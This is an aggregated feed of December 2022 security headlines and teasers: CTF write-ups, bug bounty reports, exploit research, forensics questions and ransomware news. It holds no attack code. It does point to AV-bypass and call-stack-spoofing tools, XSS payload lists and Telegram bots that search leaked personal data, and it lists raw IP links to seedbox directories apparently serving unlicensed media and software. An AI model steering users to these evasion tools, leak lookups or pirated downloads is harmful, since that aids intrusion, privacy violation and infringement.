    Maltego OSINT Lab for Keeber Challenge in Secure, Private and Non-Attribution Kasm Workspace
    Maltego OSINT Linux Workspace used for Keeber Challenge from #NahamCon CTF 2022 from Tech Raj (https://youtu.be/06BhA67BhR0) covering… Continue reading on Medium »
    SPY NEWS: 2022 — Week 49
    Summary of the espionage-related news stories for the Week 49 ( December 4–10) of 2022. Continue reading on Medium »
    Telegram… TON… sale of nicknames and phone numbers… Where is the anonymity?
    I am asked questions about how the identification of Telegram users will now take place … After all, Durov, it’s scary to say, introduced… Continue reading on Medium »
  • Open

    Loading unsigned Windows drivers without reboot
    submitted by /u/dmchell [link] [comments]
    Detecting heap memory pitfalls, step by step and using custom taint analysis to detect heap security issues
    submitted by /u/CoolerVoid [link] [comments]
    Free to enroll, a red teaming course
    Great course here, goes into C2 and other interesting red teaming aspects. https://taggartinstitute.org/p/responsible-red-teaming submitted by /u/volgarixon [link] [comments]
  • Open

    Finding JIT Optimizer Bugs Using SMT Solvers and Fuzzing
    Article URL: https://www.pypy.org/posts/2022/12/jit-bug-finding-smt-fuzzing.html Comments URL: https://news.ycombinator.com/item?id=33946899 Points: 2 # Comments: 0
  • Open

    Detecting heap memory pitfalls
    submitted by /u/CoolerVoid [link] [comments]
    Fuzzing ping(8)…and finding a 24 year old bug
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-12-11 Review
    No news updated today. For more recent articles, visit SecWiki
  • Open

    TryHackMe | Advent of Cyber Part 2
    Hi there! In this article, we’ll continue “Advent of Cyber 2022” learning path in TryHackMe together. Continue reading on Medium »
  • Open

    GitHub Actions Vulnerability – Artifact Poisoning
    Article URL: https://www.legitsecurity.com/blog/artifact-poisoning-vulnerability-discovered-in-rust Comments URL: https://news.ycombinator.com/item?id=33941780 Points: 2 # Comments: 0
  • Open

    Reading memory values in IDA
    Maybe somebody can help here. More in SO question https://stackoverflow.com/questions/74757178/get-memory-rom-prom-values-from-ida-disassembler submitted by /u/marcinguy [link] [comments]
  • Open

    Exploiting CVE-2022-42703 – Bringing back the stack attack
    Article URL: https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html Comments URL: https://news.ycombinator.com/item?id=33941146 Points: 1 # Comments: 0
  • Open

    imaging failed with FTK
    I created a VHD of 1GB and was tasked with imaging it with FTK Imager. But it gives me "ran out of disk space during memory capture". What do I have to do to fix this? It's my first time using FTK. submitted by /u/Hot-Sun-6127 [link] [comments]
  • Open

    Pidfd and Socket-lookup BPF (SK_LOOKUP) Illustrated (2022)
    TL; DR Most unix programming text books as well as practices hold the following statements to be true: One socket could be opened by one and only one process (application); One socket could listen/serve on one and only one port; Recall the bind system call int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen) where addr is determined by IP+Port (and socket address family). However, with some advanced techniques like pidfd_getfd() system call in Linux kernel 5.4+ and SK_LOOKUP BPF in kernel 5.6+, we could easily break the above limitations, supporting scenarios like below: +-----------+ +-----------+ +----------+ +------------------+ | Process 1 | | Process 2 | | Process 3| | Process(app) | …
    [Translation] Socket listen on multiple addresses: the need, and the birth of SK_LOOKUP BPF (LPC, 2019)
    Translator's preface: This article is a combined translation of several Cloudflare talks, introducing their unique networking requirements, the evolution of their solutions, and the ultimate solution, the birth of SK_LOOKUP BPF: Programming socket lookup with BPF, LPC, 2019; It's crowded in here, Cloudflare blog, 2019; Steering connections to sockets with BPF socket lookup hook, eBPF Summit, 2020. Due to the translator's limited ability, this article may contain omissions or errors; if in doubt, please consult the original. The translation follows. Translator's preface 1 Introduction 1.1 Status quo: Cloudflare's edge architecture 1.2 Requirement: how to have one service listen on at least several hundred IP addresses 2 Scenario requirements and solution evolution 2.1 Simple scenario: one socket listening on one IP address 2.2 Advanced scenario: one socket listening on multiple IP addresses 2.2.1 bind(INADDR_ANY) or bind(0.0.0.0) 2.2.2 listen() on an unbound socket 2.2.3 Technical principle: kernel socket lookup logic 2.2.4 Pros and cons 2.3 Devilish scenario: different services on the same machine using the same port (non-overlapping IPs) 2.4 Hellish scenario: one service listening on all 65535 ports 2.4.1 iptables + TPROXY 2.4.2 Drawbacks of the TPROXY approach 2.4.3 Is there a silver bullet? 3 SK_LOOKUP BPF: programming the socket lookup process 3.1 Design philosophy 3.2 Introducing a new BPF program type, SK_LOOKUP 3.2.1 Program execution location 3.2.2…

  • Open

    MS Sentinel Analytics & KQL
    I'm struggling to learn how to create custom analytics rules (KQL queries) in Sentinel both over Microsoft native connectors (Azure AD, Office 365) and a syslog connector (all kinds of logs, mainly Windows Server logs). If you've got any experience with this problem, I'd appreciate if you could share some resources that helped you learn KQL when you started dealing with this (I have an idea about what I want to monitor, I just have some issues putting the KQL queries together). Thanks! submitted by /u/FreakySeahorse [link] [comments]
  • Open

    CRTP — Overview and Tips!
    CRTP, or Certified Red Team Professional, is a Pentester Academy exam that consists of abusing features and functionality in a… Continue reading on Medium »
  • Open

    A vulnerability classified as critical has been found in gsi-openssh-server 7.9p1 on Fedora (Connectivity Software) on server (http://95.217.64.181:22
    Nextcloud disclosed a bug submitted by ibrahim71192: https://hackerone.com/reports/1726445
    SSRF vulnerability can be exploited when a hijacked aggregated api server such as metrics-server returns 30X
    Kubernetes disclosed a bug submitted by weinongw: https://hackerone.com/reports/1544133 - Bounty: $1000
  • Open

    Advent of Cyber 2022 [Day9]-Pivoting | Dock the halls — Short Writeup and Walkthrough
    No content preview
    Year of the Rabbit — TryHackMe Writeup By Karthikeyan
    No content preview
    TryHackMe CMesS CTF
    No content preview
    Operationalizing MITRE ATT&CK to harden cyber defenses
    Take Adversary’s perspective in Defender’s Team Continue reading on InfoSec Write-ups »
    TryHackMe writeup: Basic Pentesting
    In this room, I discuss the process that I used to complete TryHackMe’s “Basic Pentesting” room. Continue reading on InfoSec Write-ups »
    Recon
    No content preview
    Write-up: DOM XSS in document.write sink using source location.search @ PortSwigger Academy
    No content preview
    Smart contracts
    No content preview
  • Open

    Block 1M+ users from accessing their accounts by taking over third-party service
    Night Hunter is not one person; night hunter is everyone who chooses to hack for a reason. Night hunters are always thirsty for more and more… Continue reading on Medium »
    Subdomain Enumeration…? DNS-Discovery
    Hello to all Thank you for your support😊, today will see How to Install, Test and Run DNS-Discovery on Kali Linux. Continue reading on Medium »
    Automate Cross-Site Scripting (XSS) exploitation with unusual events and Burp Intruder
    As a bug bounty hunter, it’s always a thrilling experience to come across a vulnerability that allows you to bypass a web application… Continue reading on Medium »
    Scoring $$$ for a very simple bug : You don’t always need proxy tools
    Hello Everyone, Continue reading on Medium »
  • Open

    Viewing the information in a photo with exiftool
    Hello everyone, this time I will share how to find information in an image with extensions such as .png, .jpg, .jpeg and… Continue reading on Medium »
    Telegram hacker bots
    All the bots are current; we checked them for scams before publishing. Of course, they don't guarantee a 100% result, but if the information is in the leaks… Continue reading on Medium »
    Analysis of the whitewashing of human rights violations in Xinjiang, China
    Chris Osieck Editing in English by Sarah Stoecklin Web spider and Python by Mischa Untaga Research Support by Rosa Noctis Continue reading on Medium »
  • Open

    What is your day to day life as a DFIR specialist?
    Actually I am wondering, what your day to day life is and especially: what do you do when there are no incidents. I am curious because I really like DFIR and I am already a SOC analyst, but I am scared that it will be boring most of the time. submitted by /u/LogDumpster [link] [comments]
  • Open

    SecWiki News 2022-12-10 Review
    Thinkphp multilingual RCE by ourren. For more of the latest articles, visit SecWiki
  • Open

    Pwn2Own Toronto 2022 Results
    submitted by /u/seyyid_ [link] [comments]
  • Open

    Nebuchadnezzar - Practically-exploitable Cryptographic Vulnerabilities in Matrix
    submitted by /u/Gallus [link] [comments]
    Mobile Bug Bounty Hunting? Enter BLE – Cybervelia
    submitted by /u/Necessary-Reality-80 [link] [comments]
    Polar: debugging on LLDB using OpenAI's davinci-003 language model - @ant4g0nist
    submitted by /u/ant4g0nist [link] [comments]

  • Open

    Various directories from seedboxes (should be fast) NSFW/Movies/Music/TV/software
    http://185.148.3.219:37863/ http://185.148.3.100:9514/ http://185.148.3.141:36657/ http://185.148.3.141:30114/tres/ http://185.148.1.97:30332/ http://185.148.1.166:36285/ http://185.148.1.115:36796/ http://185.148.1.102:36724/ http://185.148.0.38:34592/ http://185.148.0.145:37886/ BIG ONE http://185.148.3.226:21668/ http://185.148.3.184:28903/ http://185.148.3.182:21548/ http://185.148.3.141:22993/ http://185.148.1.158:27881/ http://185.148.1.149:26629/ http://185.148.1.123:25147/cavs/ http://185.148.1.97:18558/ submitted by /u/mingaminga [link] [comments]
    A bunch of PDF's about military songs
    Not a true OD, but almost. Looks like a bunch of PDF's . Copied from the website: " This is where we place my Military Songbook Collection which includes naval, army and marine songbooks. This list was last updated 30 Mar 2020." Military Songbook Collection submitted by /u/BustaKode [link] [comments]
    A bunch of naughty songs
    Another true OD. Seems like a huge collection of "naughty songs" in some of the subs, plus normal songs if interested. Did not check them all out. Naughty and normal songs submitted by /u/BustaKode [link] [comments]
    Just in time for Christmas
    Some Christmas songs. There are some unique ones in the mix. A true OD. Christmas Songs submitted by /u/BustaKode [link] [comments]
  • Open

    How to work with Bloodhound output?
    Hi there, I tried to use Bloodhound in the context of an AD audit (I had planned to use it with Ping Castle and Purple Knight). But I see this Bloodhound output and, honestly speaking, I can't create a step-by-step process for how to process the data I see, how to identify any red flag, how to identify non-best-practice user management, how to identify user/workstation risks. I see that my expertise in this is small; I thought to deal with it myself, but so far I have received nothing. Can someone share your thoughts? How do you work with this? What do you pay attention to? Red teams/pentesters, please join the conversation. submitted by /u/athanielx [link] [comments]
    Tiers Implementation NIST
    I am doing a cybersecurity course and I am in the middle of an assessment where I really struggle to complete one of the questions which is: Develop a report for the security control implementation guideline. Consider appropriate cyber security strategy for the guideline. You need to assume possible tools that are relevant for controlling the identified risks and produce a toolkit. The case study is the Marriott Hotel submitted by /u/Daikon_United [link] [comments]
    Why do so many firms use SMS for 2FA when cellphone numbers are regularly reassigned?
    Cellphone numbers are regularly reassigned, resulting in third parties receiving auth codes. SMS isn't even encrypted. SMS isn't accessible from abroad in many cases. Why is SMS used as 2FA? Specifically, why do even financial firms resort to this practice? It's unrealistic and either lazy or naive to expect users to regularly update their phone numbers for every service after they switch. submitted by /u/Jerooast [link] [comments]
  • Open

    OIDC — Github Actions Abuse
    Hi readers, here we will see how someone knowing/guessing the role ARN created for GitHub Actions can escalate privileges. Continue reading on Medium »
  • Open

    Investigating ‘Fraud Factories’ of Myanmar
    Scam centres that lured hundreds of Indians into Cyber Slavery. Continue reading on Medium »
    10 Practical Recon & vulnerability Scanners for bug hunters (part one)
    Continue reading on Medium »
    TryHackMe: Advent of Cyber 2022 (Day 3) Nothing escapes detective McRed
    “As the elves are trying to recover the compromised santagift.shop website, elf Recon McRed is trying to figure out how it was compromised… Continue reading on Medium »
  • Open

    How would you run a process under the localservice/network user in C?
    submitted by /u/yomyoo [link] [comments]
    RtlCreateUserProcess C Source
    I discovered something known as the Windows Research Kernel (WRK) https://github.com/mic101/windows which contains the C/assembly source code for the Windows Server 2003 SP1 kernel. You can view the C source implementation for functions such as RtlCreateUserProcess https://github.com/mic101/windows/blob/master/WRK-v1.2/base/ntos/rtl/rtlexec.c as well as NtCreateProcess and the entire flow of process creation. Sharing this because it is the solution to creating a process using system calls and redirecting standard out/error to a pipe or other handle. submitted by /u/edreatingmonkey [link] [comments]
  • Open

    Ongoing Typosquatting Campaign Publishing Malware to PyPI
    submitted by /u/louis11 [link] [comments]
    Cool vulns don't live long - Netgear and Pwn2Own
    submitted by /u/Gallus [link] [comments]
    Using ChatGPT to Generate Phishing Campaigns
    submitted by /u/rickyrockslide [link] [comments]
    Hooking System Calls in Windows 11 22H2 like Avast Antivirus. Research, analysis and bypass
    submitted by /u/Gallus [link] [comments]
  • Open

    Supply Chain Attacks on the risk - Open Source Security
    No content preview
    TryHackMe writeup: RootMe
    A simple TryHackMe room that is good stuff for ctf practice. I root a boot2root system with a Katana sword (and Python ;-) Continue reading on InfoSec Write-ups »
    HackTheBox — Networked Writeup
    No content preview
    Email analysis : avoid phishing attacks
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 7] Maldocs roasting on an open fire— No Answers :P
    Day 7 Learning Objectives: Continue reading on InfoSec Write-ups »
    The most underrated injection of all time — CYPHER INJECTION.
    No content preview
    STRIPE Live Key Exposed:: Bounty: $1000
    No content preview
    Don’t Miss the Expert Talks at IWCON2022 Cybersecurity Conference
    No content preview
  • Open

    [Vulnerability Advisory] Thinkphp multilingual module command execution vulnerability
    If a Thinkphp application has the multilingual feature enabled, an attacker can pass parameters via GET, headers, cookies and other locations to achieve directory traversal plus file inclusion; combined with the pearcmd file-inclusion trick, this can achieve...
  • Open

    Bug Zero at a Glance [Week 3–9 December]
    What happened with Bug Zero? Continue reading on Bug Zero »
    10 Practical Recon & vulnerability Scanners for bug hunters (part one)
    Continue reading on Medium »
    Cross Origin Resource Sharing: Hacking Bank Accounts
    TL;DR- Commonly known as CORS, Cross Origin Resource Sharing is a crucial functionality for all websites. Continue reading on The Gray Area »
    Partnering with Immunefi to Ensure Exactly’s Safety: Introducing our Bug Bounty Program
    At Exactly Protocol, we prioritize security above all else. That is why we have had our smart contracts audited by top audit firms at… Continue reading on Medium »
    All about: Single-Sign On (SSO)
    Single sign-on (SSO) is a feature that allows users to access multiple services belonging to the same organization without logging in… Continue reading on Medium »
    STRIPE Live Key Exposed:: Bounty: $1000
    Hey Hunters, Continue reading on InfoSec Write-ups »
    PRIVATE VS PUBLIC BUG BOUNTY PROGRAM
    WHAT IS A BUG BOUNTY PROGRAM? Continue reading on Medium »
    Vertical Privilege Escalation: The user can takeover an admin account via response manipulation
    Privilege escalation attacks occur when a threat actor gains access to an employee’s account, bypasses the proper authorization channel… Continue reading on Medium »
    Privilege Escalation to remove the owner from the organization
    Hi Hackers, today I am going to tell you about one of my interesting findings, which is a privilege escalation to remove the owner from the… Continue reading on Medium »
    XSS Hunter Slack Alerts
    This is a tutorial of how to setup XSS Hunter with Slack Alerts Continue reading on Medium »
  • Open

    SecWiki News 2022-12-09 Review
    ACSAC 2022 list of accepted papers by ourren. For more of the latest articles, visit SecWiki
  • Open

    Your money or your life? Hospital hit by ransomware suspends surgeries and transfers critical patients
    The ransomware attackers set a ransom for decrypting the systems; the hospital can choose not to pay. But for patients in urgent need of surgery, this is tantamount to "murder".
    Apple upgrades data protection: iCloud enables end-to-end encrypted backups
    The new Advanced Data Protection feature enables end-to-end encrypted (E2EE) data backups in iCloud. The feature is opt-in and is expected to roll out in the US by the end of this year.
    FreeBuf Morning Report | US sues TikTok over children's data security; US Department of Health warns that ransomware is targeting healthcare organizations
    Cisco disclosed a high-severity vulnerability affecting its latest generation of IP phones, exposing them to remote code execution and denial-of-service (DoS) attacks.
    FreeBuf Weekly | Ukraine's IT Army took down Russia's second-largest bank; multiple serious security vulnerabilities exposed in Mitsubishi Electric PLCs
    This article summarizes the week's hot news, security incidents, good reads and handy tools, so you won't miss any of the highlights!
    The "匿影" group is active again: launching ransomware attacks by brute-forcing databases
    The "匿影" group was first disclosed in March 2019; in the three years since, it has remained highly active and its variants have kept evolving.
    Hive ransomware group attacked European retailers over Black Friday; it has hit 1,300 companies in total
    The Black Friday attack affected Intersport stores in northern France; all employee data was leaked.
  • Open

    Is it practically possible that two drives (identical make) have the same MD5 hash?
    Is it practically possible that two drives (identical make) have the same MD5 hash? Image is physical and done via FTK imager. Shouldn’t they differ even when they are used in raid? submitted by /u/One-Neighborhood1742 [link] [comments]
  • Open

    What is Cross-site scripting (XSS)?
    Cross-site scripting (XSS) is one of the techniques hackers use to inject code into a website and exploit bugs… Continue reading on Medium »
  • Open

    [nextcloud/server] Moment.js vulnerable to Inefficient Regular Expression Complexity
    Nextcloud disclosed a bug submitted by mik-patient: https://hackerone.com/reports/1712329

  • Open

    Bitlocker and unencrypted key traces
    Let's say a Windows drive is encrypted from within the OS, with "Encrypt used disk space only". Is it possible that some unencrypted data about any of the protectors (like password or recovery password) is left behind? On an SSD the data usually isn't overwritten if there's free space. I guess Bitlocker isn't stupid enough to write unencrypted keys to a not-yet-encrypted drive directly. But maybe the keys are in RAM and then they end up in the pagefile? Is the pre-encryption process explained in detail somewhere? submitted by /u/newser21 [link] [comments]
    Cellebrite Blank Messages
    I have seen on almost all my recent iPhone collections that Cellebrite shows some blank messages for messages that are visibly still on the device. It’s alarming that the message is not deleted on the device and appears to not be pulled. These are not in the Instant Messages tab. I’m seeing these in the typical Native Messages tab, within conversations that have other messages that were pulled just fine. I’ve been able to replicate the issue when collecting my personal device using Cellebrite 4PC as well as doing an iTunes Backup. Some messages that are on my personal phone show up as blank in Cellebrite Physical Analyzer. I’ve opened a ticket with Cellebrite, but was wondering if anyone else has been experiencing this lately. TLDR: Some iMessages that are on a device, not deleted, are appearing as blank in Cellebrite. submitted by /u/TheInvisiblePoo [link] [comments]
    Anyone using Axiom REVIEW?
    I don't know why they capitalize every product name... Anyway, I'm hearing about REVIEW and wondering if anyone has used it. What are your thoughts? Does it pull info from multiple cases? submitted by /u/ShakeyShooter [link] [comments]
    confused
    Hi, I was hoping someone on here could explain what a computed hash is and what a reported hash is. Thanks submitted by /u/Acceptable_Use4747 [link] [comments]
  • Open

    Compromised Cloud Compute Credentials: Case Studies From the Wild
    A walk-through of attacks in the wild that abuse stolen cloud compute credentials in the cloud environment. Unit 42 researchers highlight two case studies. The post Compromised Cloud Compute Credentials: Case Studies From the Wild appeared first on Unit 42.
  • Open

    Nosey Parker: a new scanner to find misplaced secrets in textual data and Git history
    submitted by /u/exploding_nun [link] [comments]
    Hacking the Furbo Dog Camera: Part III
    submitted by /u/somersetrecon [link] [comments]
    Fuzzing Golang msgpack for fun and panic
    submitted by /u/Schwag [link] [comments]
    How to secure your Open Source Project – A quick guide for developers
    submitted by /u/TupleType1 [link] [comments]
    Using JSON in a New Generic Web Application Firewall Bypass
    submitted by /u/derp6996 [link] [comments]
    cli google search client written by chatgpt ai - bypasses captcha and rate limiting
    submitted by /u/endless [link] [comments]
    Shoggoth
    Shoggoth: Asmjit Based Polymorphic Encryptor submitted by /u/DarkGrejuva [link] [comments]
    GitHub - klezVirus/SilentMoonwalk: PoC Implementation of a TRUE call stack spoofer
    submitted by /u/R3dCr0wn [link] [comments]
  • Open

    Bug Bounty Hunting 101 — Remote Code Execution (RCE)
    TL;DR- The best ways to utilize different vulnerabilities and chain them together for high level bug bounties! Continue reading on The Gray Area »
    Masa Bug Bounty Program Is Open!
    Masa is officially launching our ongoing bug bounty program, which is now open for community participation. We are also offering a special… Continue reading on Medium »
    Upgrading Your XSS Bugs from Medium to Critical: Techniques and Examples
    Cross-site scripting (XSS) is a common vulnerability in web applications that allows attackers to inject malicious code into web pages and… Continue reading on Medium »
    CORS Misconfig on Out of scope domain Bug Bounty Writeup (300 USD Reward )
    I got an invite to a bug bounty program, the scope of the testing was on app.redacted.com While checking and understanding the login… Continue reading on Medium »
    A software bug captured Apple and other huge companies
    We collected some hot stories about programming errors for you to have a little fun and learn something new :) Continue reading on PVS-Studio »
    Hacking Government-Millions of Death-Certificate(EASY)
    Here’s how I gained the access to Millions of Death Certificates by discovering 3 vulnerabilities. I hacked a state government website… Continue reading on Medium »
    Taking Over Databases using SQL Map — SQL Injection Attacks
    SQLMap can help identify SQL injection vulnerabilities in web applications. Learn how to exploit and take over databases in this practical… Continue reading on Stealth Security »
    Account takeover without user interaction via the mail server
    Night Hunter is not one person; night hunter is everyone who chose to hack for a reason. Night hunters are always thirsty for more and more… Continue reading on Medium »
  • Open

    PAI Research Process, part 1
    There is no one best research process or method for everyone. Each PAI researcher will develop workflows that suit their needs best, and… Continue reading on Medium »
    OSINT and Critical Posts on Social Media
    By now each of us has at least one phone, and we live in the age of "social sharing", with our accounts full of critical photos and videos… Continue reading on Medium »
  • Open

    Exploiting CVE-2022-42703 – Bringing back the stack attack
    Article URL: https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html Comments URL: https://news.ycombinator.com/item?id=33913961 Points: 1 # Comments: 0
  • Open

    🎁 Giveaway 🎁
    submitted by /u/Strict_Pomegranate78 [link] [comments]
  • Open

    Insecure use of shell.openExternal() leads to RCE in Rocket.Chat-Desktop
    Rocket.Chat disclosed a bug submitted by sectex: https://hackerone.com/reports/1781102
  • Open

    Microsegmentation and Routing
    Network topology question... If you're doing micro-segmentation using a hypervisor firewall (NSX-T or Nutanix Flow, for example), is there any advantage to having your application tiers on different subnets? Seems to me, if you're making security decisions without having to traverse a router, that's better -- the routing step just adds complexity for no security benefit. But, the NSX-T manual is really into its own Logical Routing chapter: https://nsx.techzone.vmware.com/resource/nsx-t-reference-design-guide-3-0#_NSX-T_Logical_Routing_1 So, what's the benefit to routing that I'm not getting? Or, is this just to placate managers that can't separate the concept of a firewall from the concept of a router? submitted by /u/eldergrapple [link] [comments]
    Monitor USB camera network activity
    Hello, Is this feasible? Let’s say we plug in a webcam, no installation of software, only uses windows built in drivers, could the webcam possibly communicate to a remote host? Technically there is no « known » process to monitor. Would need to capture the regular traffic without the camera, then with the camera, then another one while being in a meeting. Is this all overkill? Can we assume USB camera would not be doing communication to the company website let’s say? Thanks for your input! :) submitted by /u/unm3 [link] [comments]
    Newbie help?
    Hi all, I am a wannabe red teamer. I have some training in the workings of TCP/IP as well as general cybersecurity training. I am somewhat familiar with OWASP and have contributed to some network scanning surveys. As a wannabe red teamer, I was wondering what type of exploit framework I should use. I would prefer something easy to use; I will however prefer a steep learning curve with a powerful tool. I would write my own tools, I just don't know enough. What exploit tools or premade tools could I take advantage of after the recon stage? I have used a little of sqlmap, as well as BeEF. These however really cover only XSS and SQL injection. Right now I am trying to get this bug bounty and I found a weakness that could be exploited. I just need some other tools to be able to exploit that weakness. Any thoughts, criticisms or ideas would be greatly appreciated. I would definitely appreciate any old hacker wisdom for my journey. submitted by /u/Johhny_Texas [link] [comments]
    How to conduct a security assessment of AWS?
    Hi there, we need to make a security assessment of AWS (buckets, users, servers, etc.). We need to evaluate current security controls, identify risks and try to fix them. Do you know any free third-party tools that can be used to conduct the assessment? Let me share my old notes about it (I never used these tools): https://github.com/toniblyx/prowle (it looks like a huge checklist) https://github.com/nccgroup/ScoutSuite (I used it for GCP one time, but I can't say if it is good for AWS) https://github.com/abhaybhargav/bucketeer https://github.com/scalefactory/s3audit (it looks interesting, because I need to identify if we have open buckets) What can you suggest for built-in tools that can show the security posture of AWS? submitted by /u/athanielx [link] [comments]
    Found external open ports on my router, now what?
    Ran an nmap port scan of my router from an external machine out of curiosity. To my surprise, it reported 5 open ports in the 50xxx - 58xxx range to which I am able to open a telnet connection. The only thing that I have set in port forwarding is a UDP port to my Pi running WireGuard VPN. But even when I close it, the detected ports are still open and connectable. What can I do now to try and figure out what that may be? Should I be worried about a compromised router (which is supplied by my local ISP - Bell Canada)? Edit: UPnP is closed on the router. submitted by /u/MrMag00 [link] [comments]
  • Open

    Introducing passkeys in Chrome
    We announced in October that passkey support was available in Chrome Canary. Today, we are pleased to announce that passkey support is now available in Chrome Stable M108. What are passkeys? Passwords are typically the first line of defense in our digital lives. However, they are at risk of being phished, leaked in data breaches, and even suffering poor password hygiene. Google has long recognized these issues, which is why we have created defenses like 2-Step Verification and Google Password Manager. To address these security threats in a simpler and more convenient way, we need to move towards passwordless authentication. This is where passkeys come in. Passkeys are a significantly safer replacement for passwords and other phishable authentication factors. They cannot be reused, don'…
  • Open

    SecWiki News 2022-12-08 Review
    Security test case library by ourren; 2022 "CCF Outstanding Doctoral Dissertation Award" paper list by ourren; BlackHat 2022: interpretation of new 4G/5G front-door attacks by ourren. For more of the latest articles, visit SecWiki
  • Open

    Implementing Systemfunction033 shellcode encoding and decoding in cpp to bypass AV
    submitted by /u/intruderK [link] [comments]
    Shoggoth
    Shoggoth: AsmJit based Polymorphic Encryptor https://github.com/frkngksl/Shoggoth submitted by /u/DarkGrejuva [link] [comments]
  • Open

    FreeBuf Morning Report | Apple rolls out end-to-end encryption for iCloud; Japan plans to add cyber defense to its security policy
    Digital services in Belgium's largest city were forced offline by a cyberattack; the Japanese government plans to add cyber defense and related content to its security-related documents.
    Large numbers of Chinese websites hacked, with World Cup keywords injected for black-hat SEO
    Researchers discovered World Cup-related black-hat SEO affecting more than 50,000 sites.
    Vice Society ransomware runs rampant, hitting 33 educational institutions in one year
    Educational institutions with limited cybersecurity capability and resources are often the most vulnerable to cyber threats and are becoming potential targets of ransomware groups.
    On day one of Pwn2Own 2022, Samsung's flagship Galaxy S22 was hacked twice
    Not coincidentally, at last year's Pwn2Own, Samsung's then-newest flagship, the Galaxy S21, was likewise "hacked".
  • Open

    New Burp Suite API: we want your feedback!
    If you follow the Burp Suite roadmap, then you'll know that we're working on a complete rewrite of the API used in Burp Suite Professional and Burp Suite Community Edition. The new API is codenamed "M
  • Open

    Fuzzing ping(8) and finding a 24 year old bug
    Article URL: https://www.undeadly.org/cgi?action=article;sid=20221208082054 Comments URL: https://news.ycombinator.com/item?id=33906401 Points: 1 # Comments: 0
  • Open

    Hacking into Wi-Fi Camera TP-Link Tapo C200 (CVE-2021–4045)
    No content preview
  • Open

    Critical Vulnerability in Hasura GraphQL Engine v2.10.0
    Article URL: https://hasura.io/blog/critical-vulnerability-in-hasuras-graphql-engine-v2-10-0/ Comments URL: https://news.ycombinator.com/item?id=33904145 Points: 1 # Comments: 0

  • Open

    P1 Bug Hunting — Account Takeover w/ 2FA Bypass
    TL;DR- Locating and exploiting critical bugs can be tricky, as only a handful of dedicated bug hunters have ever found a P1 vulnerability. Continue reading on The Gray Area »
    What is Clickjacking?
    Hello everyone! Continue reading on Medium »
    A03:2021 — [Injection] SQL Injection through internal directory disclose
    Every tool is good if you know how to control noise from that! Continue reading on Medium »
    Masa Finance. Protocol overview. Airdrop and the upcoming mint of the .soul domain name. Masa Bug.
    Disclaimer: This article reflects the author's opinion and is not financial advice; do your own research before… Continue reading on Medium »
    How I Found my First website Vulnerability
    Today, I want to share with you the story of how I found my first XSS vulnerability. It was a thrilling experience and I want to share it… Continue reading on Medium »
    Sensitive Information Disclosure in Mobile Application
    Most of the bug bounty program consist of Android/iOS application within their scope. These are some of the scope which are less tested… Continue reading on Medium »
    Bug Bounty Hunting Tips
    Bug bounty hunting is a popular way for cyber-security professionals and researchers to earn money by identifying and reporting security… Continue reading on Medium »
    TGA Weekly Newsletter [12/07/22]
    The Gray Area’s newsletter from 11/30/22 → 12/07/22, with a bunch of newly published must-reads. Continue reading on The Gray Area »
    SQL Injection Extracts Online Users status , completed registrations, net overall posts l Database
    Description: Continue reading on Medium »
  • Open

    You Won’t Believe the Top 5 Reasons Why X Blows Z Out of the Water!
    If you're trying to decide between X and Z, there are a few key reasons why you should consider choosing X over Z. Continue reading on Medium »
    Cross-Site Scripting (XSS) Vulnerability Payload List
    XSS Payload List Continue reading on Medium »
    30 Encoded XSS Payloads generated by ChatGPT
    8000+ XSS Payloads Continue reading on Medium »
  • Open

    index-of.es no longer open?
    It used to be a gigantic, amazing library; how come it's password protected now? https://preview.redd.it/gz4khata4k4a1.png?width=1537&format=png&auto=webp&s=deac5f5b32f49afd69c6c405075ceb0be23e5b12 submitted by /u/pioliX000
    1001 Tutorials
    http://www.fricking.ninja/DIY/index/1001%20Tutorials/ submitted by /u/ManaHoney504
  • Open

    Firewalls under the hood - UFW
    submitted by /u/doitsukara
    PyPI-distributed malicious package campaign tying into GitHub accounts and embedded into repos to disguise its intention - FULL ANALYSIS
    submitted by /u/dalmoz
    RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass
    submitted by /u/Gallus
  • Open

    SQL Injection on []
    Sony disclosed a bug submitted by splint3rsec: https://hackerone.com/reports/1213207
    DNS rebinding in --inspect via invalid octal IP address
    Node.js disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1710652
    Unauthorized access to resumes stored on LinkedIn
    LinkedIn disclosed a bug submitted by headhunter: https://hackerone.com/reports/1777095 - Bounty: $5000
  • Open

    Analytic thinking: Examining claims about Twitter spam and protests in China
    In my last blog post, I outlined a few of the qualities and skills I’ve found useful as a digital investigator who’s worked in human… Continue reading on Medium »
  • Open

    Google discovered North Korea exploiting an IE zero-day vulnerability in October
    Article URL: https://www.theverge.com/2022/12/7/23498226/google-north-korea-exploited-internet-explorer-vulnerability-security Comments URL: https://news.ycombinator.com/item?id=33896316 Points: 2 # Comments: 0
    Hackers Could Remotely Unlock and Start Cars Through SiriusXM Vulnerability
    Article URL: https://www.thedrive.com/news/hackers-could-unlock-and-start-remotely-connected-cars-through-siriusxm-vulnerability Comments URL: https://news.ycombinator.com/item?id=33889202 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-12-07 Review
    DISTDET: A Cost-Effective Distributed Cyber Threat Detection System by ourren; SEVulDet: A Semantics-Enhanced Learnable Vulnerability Detector by ourren; ConDySTA: Context-Aware Dynamic-Assisted Static Taint Analysis by ourren; Open-Source Software Supply Chain Security Series: OSS Risk Points and Prevention by ourren; A Framework for Analyzing Security Concepts by ourren. For more recent articles, visit SecWiki
  • Open

    Is Information Technology with a concentration in Cyber Security a good start if I'm looking into digital forensics?
    I also added intro to criminal justice to my first semester classes but I'm not sure how they'll cross over or anything, but I figured it would be useful submitted by /u/believeinGod_
    Linux Forensics - Talks and Workshops
    submitted by /u/boutnaru
    How can I get airdrop logs off an iPhone?
    Buddy's kid airdropped his whole school during an assembly and was suspended. But everyone's saying it's a different kid that did it, but the school needs proof. Any easy way to pull logs off of an iPhone for that? submitted by /u/Fission455
  • Open

    TryHackMe | Advent of Cyber Part 1
    Hi there! In this article, as we approach the end of 2022, we’ll review and solve the “Advent of Cyber 2022” room in TryHackMe together. Continue reading on Medium »
  • Open

    Java Security: A Detailed Explanation of the Causes of Deserialization Vulnerabilities and an Analysis of Real fastjson Vulnerabilities
